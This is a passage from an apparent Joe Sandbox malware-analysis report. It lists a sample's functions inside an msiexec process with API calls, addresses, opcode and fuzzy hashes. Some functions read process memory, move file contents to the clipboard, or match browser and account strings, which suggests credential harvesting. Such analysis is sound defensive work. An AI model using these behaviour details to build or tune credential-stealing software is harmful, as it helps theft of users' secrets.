                                                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2136311172-0
                                                                                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                        Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1936579350-0
                                                                                                        • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                        • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                        Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                        • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                        Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                        • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                        Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                        • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                        • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                        • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                        Non-executed Functions

                                                                                                        Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EmptyClipboard.USER32 ref: 004098EC
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                        • GetLastError.KERNEL32 ref: 0040995D
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                        • GetLastError.KERNEL32 ref: 00409974
                                                                                                        • CloseClipboard.USER32 ref: 0040997D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3604893535-0
                                                                                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                        Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadMessageProc
                                                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                        • API String ID: 2780580303-317687271
                                                                                                        • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                        • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                        • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                        • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                        Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EmptyClipboard.USER32 ref: 00409882
                                                                                                        • wcslen.MSVCRT ref: 0040988F
                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                        • CloseClipboard.USER32 ref: 004098D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1213725291-0
                                                                                                        • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                        • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                        Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                        • free.MSVCRT ref: 00418370
                                                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                        • String ID: OsError 0x%x (%u)
                                                                                                        • API String ID: 2360000266-2664311388
                                                                                                        • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                        • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                        Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        • OpenClipboard.USER32(?), ref: 00411878
                                                                                                        • GetLastError.KERNEL32 ref: 0041188D
                                                                                                          • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                          • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                          • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                          • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                          • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                          • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                          • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                          • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                          • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 2628231878-0
                                                                                                        • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                        • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                        • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                        • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                        Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@??3@memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865533344-0
                                                                                                        • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                        • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                        • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                        • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                        Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Version
                                                                                                        • String ID:
                                                                                                        • API String ID: 1889659487-0
                                                                                                        • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                        • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                        • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                        • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                        Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NtdllProc_Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 4255912815-0
                                                                                                        • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                        • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                        • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                        • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                        Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                        • memset.MSVCRT ref: 0040265F
                                                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                        • API String ID: 577499730-1134094380
                                                                                                        • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                        • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                        Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                        • String ID: :stringdata$ftp://$http://$https://
                                                                                                        • API String ID: 2787044678-1921111777
                                                                                                        • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                        • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                        Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                        • GetDC.USER32 ref: 004140E3
                                                                                                        • wcslen.MSVCRT ref: 00414123
                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                        • _snwprintf.MSVCRT ref: 00414244
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                        • API String ID: 2080319088-3046471546
                                                                                                        • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                        • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                        Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EndDialog.USER32(?,?), ref: 00413221
                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                        • memset.MSVCRT ref: 00413292
                                                                                                        • memset.MSVCRT ref: 004132B4
                                                                                                        • memset.MSVCRT ref: 004132CD
                                                                                                        • memset.MSVCRT ref: 004132E1
                                                                                                        • memset.MSVCRT ref: 004132FB
                                                                                                        • memset.MSVCRT ref: 00413310
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                        • memset.MSVCRT ref: 004133C0
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                        • wcscpy.MSVCRT ref: 0041341F
                                                                                                        • _snwprintf.MSVCRT ref: 0041348E
                                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                        • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                        Strings
                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                        • {Unknown}, xrefs: 004132A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                        • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                        • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                        Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
